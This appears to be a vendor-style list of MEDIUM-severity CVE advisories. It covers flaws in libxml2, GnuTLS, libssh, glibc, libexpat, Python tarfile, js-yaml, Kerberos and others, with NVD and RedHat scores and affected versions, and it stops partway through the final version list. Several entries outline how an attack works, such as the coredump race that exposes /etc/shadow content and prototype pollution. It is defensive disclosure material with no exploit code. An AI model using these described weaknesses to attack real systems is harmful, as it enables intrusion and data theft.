            CVE-2025-8291The 'zipfile' module would not check the validity of the ZIP64 End of Central Directory (EOCD) Locator record offset value would not be used to locate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be assumed to be the previous record in the ZIP archive. This could be abused to create ZIP archives that are handled differently by the 'zipfile' module compared to other ZIP implementations. Remediation maintains this behavior, but checks that the offset specified in the ZIP64 EOCD Locator record matches the expected value.MEDIUM

            NVD: n/a

            RedHat: 4.3

            • 9.2.3
            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.9
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-9714Uncontrolled recursion in XPath evaluation in libxml2 up to and including version 2.9.14 allows a local attacker to cause a stack overflow via crafted expressions. XPath processing functions `xmlXPathRunEval`, `xmlXPathCtxtCompile`, and `xmlXPathEvalExpr` were resetting recursion depth to zero before making potentially recursive calls. When such functions were called recursively this could allow for uncontrolled recursion and lead to a stack overflow. These functions now preserve recursion depth across recursive calls, allowing recursion depth to be controlled.MEDIUM

            NVD: 5.5

            RedHat: 6.2

            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.8
            • 9.1.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4598A vulnerability was found in systemd-coredump. This flaw allows an attacker to force a SUID process to crash and replace it with a non-SUID binary to access the original's privileged process coredump, allowing the attacker to read sensitive data, such as /etc/shadow content, loaded by the original process. A SUID binary or process has a special type of permission, which allows the process to run with the file owner's permissions, regardless of the user executing the binary. This allows the process to access more restricted data than unprivileged users or processes would be able to. An attacker can leverage this flaw by forcing a SUID process to crash and force the Linux kernel to recycle the process PID before systemd-coredump can analyze the /proc/pid/auxv file. If the attacker wins the race condition, they gain access to the original's SUID process coredump file. They can read sensitive content loaded into memory by the original binary, affecting data confidentiality.MEDIUM

            NVD: n/a

            RedHat: 4.7

            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.8
            • 9.1.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-9910Versions of the package jsondiffpatch before 0.7.2 are vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin. An attacker can inject malicious scripts into HTML payloads that may lead to code execution if untrusted payloads were used as source for the diff, and the result renderer using the built-in html formatter on a private website.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.8
            • 9.1.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-66030Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Integer Overflow vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions. This issue has been patched in version 1.3.2.MEDIUM

            NVD: 5.3

            RedHat: 5.3

            • 9.2.2
            • 9.2.1
            • 9.2.0
            • 9.1.8
            • 9.1.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-64718js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            • 9.1.5
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-64118node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.MEDIUM

            NVD: n/a

            RedHat: 4.7

            • 9.2.1
            • 9.1.7
            • 8.19.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-9230Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.MEDIUM

            NVD: n/a

            RedHat: 5.6

            • 9.2.1
            • 9.2.0
            • 9.1.7
            • 9.1.6
            • 9.1.5
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-13466body-parser 2.2.0 is vulnerable to denial of service due to inefficient handling of URL-encoded bodies with very large numbers of parameters. An attacker can send payloads containing thousands of parameters within the default 100KB request size limit, causing elevated CPU and memory usage. This can lead to service slowdown or partial outages under sustained malicious traffic. This issue is addressed in version 2.2.1.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.2.1
            • 9.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-13033A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.1.6
            • 9.1.5
            • 9.1.4
            • 9.1.3
            • 9.1.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-22150Undici is an HTTP/1.1 client. Starting in version 4.5.0 and prior to versions 5.28.5, 6.21.1, and 7.2.3, undici uses `Math.random()` to choose the boundary for a multipart/form-data request. It is known that the output of `Math.random()` can be predicted if several of its generated values are known. If there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, an attacker can tamper with the requests going to the backend APIs if certain conditions are met. This is fixed in versions 5.28.5, 6.21.1, and 7.2.3. As a workaround, do not issue multipart requests to attacker controlled servers.MEDIUM

            NVD: n/a

            RedHat: 6.8

            • 8.18.8
            • 8.18.7
            • 8.18.6
            • 8.18.5
            • 8.18.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-32988A flaw was found in GnuTLS. A double-free vulnerability exists in GnuTLS due to incorrect ownership handling in the export logic of Subject Alternative Name (SAN) entries containing an otherName. If the type-id OID is invalid or malformed, GnuTLS will call asn1_delete_structure() on an ASN.1 node it does not own, leading to a double-free condition when the parent function or caller later attempts to free the same structure. This vulnerability can be triggered using only public GnuTLS APIs and may result in denial of service or memory corruption, depending on allocator behavior.MEDIUM

            NVD: 8.2

            RedHat: 6.5

            • 9.1.4
            • 9.1.3
            • 9.1.2
            • 9.1.1
            • 9.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-32989A heap-buffer-overread vulnerability was found in GnuTLS in how it handles the Certificate Transparency (CT) Signed Certificate Timestamp (SCT) extension during X.509 certificate parsing. This flaw allows a malicious user to create a certificate containing a malformed SCT extension (OID 1.3.6.1.4.1.11129.2.4.2) that contains sensitive data. This issue leads to the exposure of confidential information when GnuTLS verifies certificates from certain websites when the certificate (SCT) is not checked correctly.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.1.4
            • 9.1.3
            • 9.1.2
            • 9.1.1
            • 9.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-32990A heap-buffer-overflow (off-by-one) flaw was found in the GnuTLS software in the template parsing logic within the certtool utility. When it reads certain settings from a template file, it allows an attacker to cause an out-of-bounds (OOB) NULL pointer write, resulting in memory corruption and a denial-of-service (DoS) that could potentially crash the system.MEDIUM

            NVD: 8.2

            RedHat: 6.5

            • 9.1.4
            • 9.1.3
            • 9.1.2
            • 9.1.1
            • 9.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-6395A NULL pointer dereference flaw was found in the GnuTLS software in _gnutls_figure_common_ciphersuite().MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 9.1.4
            • 9.1.3
            • 9.1.2
            • 9.1.1
            • 9.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-8058The regcomp function in the GNU C library version from 2.4 to 2.41 is subject to a double free if some previous allocation fails. It can be accomplished either by a malloc failure or by using an interposed malloc that injects random malloc failures. The double free can allow buffer manipulation depending of how the regex is constructed. This issue affects all architectures and ABIs supported by the GNU C library.MEDIUM

            NVD: n/a

            RedHat: 4.2

            • 9.1.1
            • 9.1.0
            • 9.0.4
            • 9.0.3
            • 9.0.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-10963A flaw was found in pam_access, where certain rules in its configuration file are mistakenly treated as hostnames. This vulnerability allows attackers to trick the system by pretending to be a trusted hostname, gaining unauthorized access. This issue poses a risk for systems that rely on this feature to control who can access certain services or terminals.MEDIUM

            NVD: n/a

            RedHat: 7.4

            • 8.19.4
            • 8.19.3
            • 8.19.2
            • 8.19.1
            • 8.19.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-7709An integer overflow exists in the FTS5 https://sqlite.org/fts5.html  extension. It occurs when the size of an array of tombstone pointers is calculated and truncated into a 32-bit integer. A pointer to partially controlled data can then be written out of bounds.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 8.19.3
            • 8.19.2
            • 8.19.1
            • 8.19.0
            • 8.18.7
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-8194There is a defect in the CPython “tarfile” module affecting the “TarFile” extraction and entry enumeration APIs. The tar implementation would process tar archives with negative offsets without error, resulting in an infinite loop and deadlock during the parsing of maliciously crafted tar archives. This vulnerability can be mitigated by including the following patch after importing the “tarfile” module:  https://gist.github.com/sethmlarson/1716ac5b82b73dbcbf23ad2eff8b33e1MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.1.3
            • 9.1.2
            • 9.1.1
            • 9.1.0
            • 9.0.6
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-40909Perl threads have a working directory race condition where file operations may target unintended paths. If a directory handle is open at thread creation, the process-wide current working directory is temporarily changed in order to clone that handle for the new thread, which is visible from any third (or more) thread already running. This may lead to unintended operations such as loading code or accessing files from unexpected locations, which a local attacker may be able to exploit. The bug was introduced in commit 11a11ecf4bea72b17d250cfb43c897be1341861e and released in Perl version 5.13.6MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 8.19.2
            • 8.19.1
            • 8.19.0
            • 8.18.4
            • 8.18.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-55565nanoid (aka Nano ID) before 5.0.9 mishandles non-integer values. 3.3.8 is also a fixed version.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 8.17.10
            • 8.17.9
            • 8.17.8
            • 8.17.7
            • 8.17.6
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-32414In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds memory access can occur in the Python API (Python bindings) because of an incorrect return value. This occurs in xmlPythonFileRead and xmlPythonFileReadRaw because of a difference between bytes and characters.MEDIUM

            NVD: 7.5

            RedHat: 5.6

            • 9.1.1
            • 9.1.0
            • 9.0.5
            • 9.0.4
            • 9.0.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-32415In libxml2 before 2.13.8 and 2.14.x before 2.14.2, xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer under-read. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 9.1.1
            • 9.1.0
            • 9.0.5
            • 9.0.4
            • 9.0.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-52533gio/gsocks4aproxy.c in GNOME GLib before 2.82.1 has an off-by-one error and resultant buffer overflow because SOCKS4_CONN_MSG_LEN is not sufficient for a trailing '\0' character.MEDIUM

            NVD: n/a

            RedHat: 7

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4373A flaw was found in GLib, which is vulnerable to an integer overflow in the g_string_insert_unichar() function. When the position at which to insert the character is large, the position will overflow, leading to a buffer underwrite.MEDIUM

            NVD: n/a

            RedHat: 4.8

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-5702The strcmp implementation optimized for the Power10 processor in the GNU C Library version 2.39 and later writes to vector registers v20 to v31 without saving contents from the caller (those registers are defined as non-volatile registers by the powerpc64le ABI), resulting in overwriting of its contents and potentially altering control flow of the caller, or leaking the input strings to the function to other parts of the program.MEDIUM

            NVD: n/a

            RedHat: 5.6

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 8.18.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-3576A vulnerability in the MIT Kerberos implementation allows GSSAPI-protected messages using RC4-HMAC-MD5 to be spoofed due to weaknesses in the MD5 checksum design. If RC4 is preferred over stronger encryption types, an attacker could exploit MD5 collisions to forge message integrity codes. This may lead to unauthorized message tampering.MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 8.18.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-25724list_item_verbose in tar/util.c in libarchive through 3.7.7 does not check an strftime return value, which can lead to a denial of service or unspecified other impact via a crafted TAR archive that is read with a verbose value of 2. For example, the 100-byte buffer may not be sufficient for a custom locale.MEDIUM

            NVD: 7.8

            RedHat: 4

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-6021A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow. This issue can result in memory corruption or a denial of service when processing crafted input.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4330Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata. You are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of "data" or "tar". See the tarfile extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter  for more information. Note that for Python 3.14 or later the default value of filter= changed from "no filtering" to `"data", so if you are relying on this new default behavior then your usage is also affected. Note that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.MEDIUM

            NVD: n/a

            RedHat: 7.3

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4435When using a TarFile.errorlevel = 0 and extracting with a filter the documented behavior is that any filtered members would be skipped and not extracted. However the actual behavior of TarFile.errorlevel = 0 in affected versions is that the member would still be extracted and not skipped.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-47273setuptools is a package that allows users to download, build, install, upgrade, and uninstall Python packages. A path traversal vulnerability in `PackageIndex` is present in setuptools prior to version 78.1.1. An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to remote code execution depending on the context. Version 78.1.1 fixes the issue.MEDIUM

            NVD: 8.8

            RedHat: 7.1

            • 9.0.3
            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4877There's a vulnerability in the libssh package where when a libssh consumer passes in an unexpectedly large input buffer to ssh_get_fingerprint_hash() function. In such cases the bin_to_base64() function can experience an integer overflow leading to a memory under allocation, when that happens it's possible that the program perform out of bounds write leading to a heap corruption. This issue affects only 32-bits builds of libssh.MEDIUM

            NVD: n/a

            RedHat: 4.5

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4878A vulnerability was found in libssh, where an uninitialized variable exists under certain conditions in the privatekey_from_file() function. This flaw can be triggered if the file specified by the filename doesn't exist and may lead to possible signing failures or heap corruption.MEDIUM

            NVD: n/a

            RedHat: 3.6

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-5318A flaw was found in the libssh library in versions less than 0.11.2. An out-of-bounds read can be triggered in the sftp_handle function due to an incorrect comparison check that permits the function to access memory beyond the valid handle list and to return an invalid pointer, which is used in further processing. This vulnerability allows an authenticated remote attacker to potentially read unintended memory regions, exposing sensitive information or affect service behavior.MEDIUM

            NVD: 8.1

            RedHat: 8.1

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-5351A flaw was found in the key export functionality of libssh. The issue occurs in the internal function responsible for converting cryptographic keys into serialized formats. During error handling, a memory structure is freed but not cleared, leading to a potential double free issue if an additional failure occurs later in the function. This condition may result in heap corruption or application instability in low-memory scenarios, posing a risk to system reliability where key export operations are performed.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-5372A flaw was found in libssh versions built with OpenSSL versions older than 3.0, specifically in the ssh_kdf() function responsible for key derivation. Due to inconsistent interpretation of return values where OpenSSL uses 0 to indicate failure and libssh uses 0 for success—the function may mistakenly return a success status even when key derivation fails. This results in uninitialized cryptographic key buffers being used in subsequent communication, potentially compromising SSH sessions' confidentiality, integrity, and availability.MEDIUM

            NVD: 8.8

            RedHat: 5

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-5987A flaw was found in libssh when using the ChaCha20 cipher with the OpenSSL library. If an attacker manages to exhaust the heap space, this error is not detected and may lead to libssh using a partially initialized cipher context. This occurs because the OpenSSL error code returned aliases with the SSH_OK code, resulting in libssh not properly detecting the error returned by the OpenSSL library. This issue can lead to undefined behavior, including compromised data confidentiality and integrity or crashes.MEDIUM

            NVD: 8.1

            RedHat: 8.1

            • 8.18.3
            • 8.17.8
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-4802Untrusted LD_LIBRARY_PATH environment variable vulnerability in the GNU C Library version 2.27 to 2.38 allows attacker controlled loading of dynamically shared library in statically compiled setuid binaries that call dlopen (including internal dlopen calls after setlocale or calls to NSS functions such as getaddrinfo).MEDIUM

            NVD: n/a

            RedHat: 7

            • 9.0.2
            • 9.0.1
            • 9.0.0
            • 8.18.2
            • 8.18.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-27789Babel is a compiler for writing next generation JavaScript. When using versions of Babel prior to 7.26.10 and 8.0.0-alpha.17 to compile regular expression named capturing groups, Babel will generate a polyfill for the `.replace` method that has quadratic complexity on some specific replacement pattern strings (i.e. the second argument passed to `.replace`). Generated code is vulnerable if all the following conditions are true: Using Babel to compile regular expression named capturing groups, using the `.replace` method on a regular expression that contains named capturing groups, and the code using untrusted strings as the second argument of `.replace`. This problem has been fixed in `@babel/helpers` and `@babel/runtime` 7.26.10 and 8.0.0-alpha.17. It's likely that individual users do not directly depend on `@babel/helpers`, and instead depend on `@babel/core` (which itself depends on `@babel/helpers`). Upgrading to `@babel/core` 7.26.10 is not required, but it guarantees use of a new enough `@babel/helpers` version. Note that just updating Babel dependencies is not enough; one will also need to re-compile the code. No known workarounds are available.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 9.0.1
            • 9.0.0
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-29088In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API) can cause a denial of service (application crash). An sz*nBig multiplication is not cast to a 64-bit integer, and consequently some memory allocations may be incorrect.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.18.1
            • 8.18.0
            • 8.17.7
            • 8.17.6
            • 8.17.5
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-8176A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive entity expansion in XML documents. When parsing an XML document with deeply nested entity references, libexpat can be forced to recurse indefinitely, exhausting the stack space and causing a crash. This issue could lead to denial of service (DoS) or, in some cases, exploitable memory corruption, depending on the environment and library usage.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-12243A flaw was found in GnuTLS, which relies on libtasn1 for ASN.1 data processing. Due to an inefficient algorithm in libtasn1, decoding certain DER-encoded certificate data can take excessive time, leading to increased resource consumption. This flaw allows a remote attacker to send a specially crafted certificate, causing GnuTLS to become unresponsive or slow, resulting in a denial-of-service condition.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.0.1
            • 9.0.0
            • 8.17.2
            • 8.17.1
            • 8.17.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-24528In MIT Kerberos 5 (aka krb5) before 1.22 (with incremental propagation), there is an integer overflow for a large update size to resize() in kdb_log.c. An authenticated attacker can cause an out-of-bounds write and kadmind daemon crash.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 9.0.1
            • 9.0.0
            • 8.17.3
            • 8.17.2
            • 8.17.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-12133A flaw in libtasn1 causes inefficient handling of specific certificate data. When processing a large number of elements in a certificate, libtasn1 takes much longer than expected, which can slow down or even crash the system. This flaw allows an attacker to send a specially crafted certificate, causing a denial of service attack.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 9.0.1
            • 9.0.0
            • 8.17.2
            • 8.17.1
            • 8.17.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-0938The Python standard library functions `urllib.parse.urlsplit` and `urlparse` accepted domain names that included square brackets which isn't valid according to RFC 3986. Square brackets are only meant to be used as delimiters for specifying IPv6 and IPvFuture hosts in URLs. This could result in differential parsing across the Python URL parser and other specification-compliant URL parsers.MEDIUM

            NVD: n/a

            RedHat: 6.8

            • 9.0.1
            • 9.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-0395When the assert() function in the GNU C Library versions 2.13 to 2.40 fails, it does not allocate enough space for the assertion failure message string and size information, which may lead to a buffer overflow if the message string size aligns to page size.MEDIUM

            NVD: n/a

            RedHat: 5.5

            • 9.0.0
            • 8.17.2
            • 8.17.1
            • 8.17.0
            • 8.16.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-7774A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input.MEDIUM

            NVD: 9.1

            RedHat: n/a

            • 8.16.6
            • 8.16.5
            • 8.16.4
            • 8.16.3
            • 8.16.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2025-27363An out of bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when attempting to parse font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value causing it to wrap around and allocate too small of a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution. This vulnerability may have been exploited in the wild.MEDIUM

            NVD: 8.1

            RedHat: 8.1

            • 8.17.3
            • 8.17.2
            • 8.17.1
            • 8.17.0
            • 8.16.5
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-3596RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.MEDIUM

            NVD: 9

            RedHat: 9

            • 8.17.1
            • 8.17.0
            • 8.16.3
            • 8.16.2
            • 8.16.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-50602An issue was discovered in libexpat before 2.6.4. There is a crash within the XML_ResumeParser function because XML_StopParser can stop/suspend an unstarted parser.MEDIUM

            NVD: n/a

            RedHat: 5.9

            • 8.16.1
            • 8.16.0
            • 8.15.5
            • 8.15.4
            • 8.15.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-8096When curl is told to use the Certificate Status Request TLS extension, often referred to as OCSP stapling, to verify that the server certificate is valid, it might fail to detect some OCSP problems and instead wrongly consider the response as fine. If the returned status reports another error than 'revoked' (like for example 'unauthorized') it is not treated as a bad certficate.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 8.15.1
            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-45490An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.15.1
            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-45491An issue was discovered in libexpat before 2.6.3. dtdCopy in xmlparse.c can have an integer overflow for nDefaultAtts on 32-bit platforms (where UINT_MAX equals SIZE_MAX).MEDIUM

            NVD: 9.8

            RedHat: 7.5

            • 8.15.1
            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-45492An issue was discovered in libexpat before 2.6.3. nextScaffoldPart in xmlparse.c can have an integer overflow for m_groupSize on 32-bit platforms (where UINT_MAX equals SIZE_MAX).MEDIUM

            NVD: 9.8

            RedHat: 6.2

            • 8.15.1
            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-4067The NPM package `micromatch` prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching. This issue was fixed in version 4.0.8.MEDIUM

            NVD: 5.3

            RedHat: 7.5

            • 8.15.1
            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-37370In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can modify the plaintext Extra Count field of a confidential GSS krb5 wrap token, causing the unwrapped token to appear truncated to the application.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
            • 8.14.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-37371In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can cause invalid memory reads during GSS message token handling by sending message tokens with invalid length fields.MEDIUM

            NVD: 9.1

            RedHat: 6.5

            • 8.15.0
            • 8.14.3
            • 8.14.2
            • 8.14.1
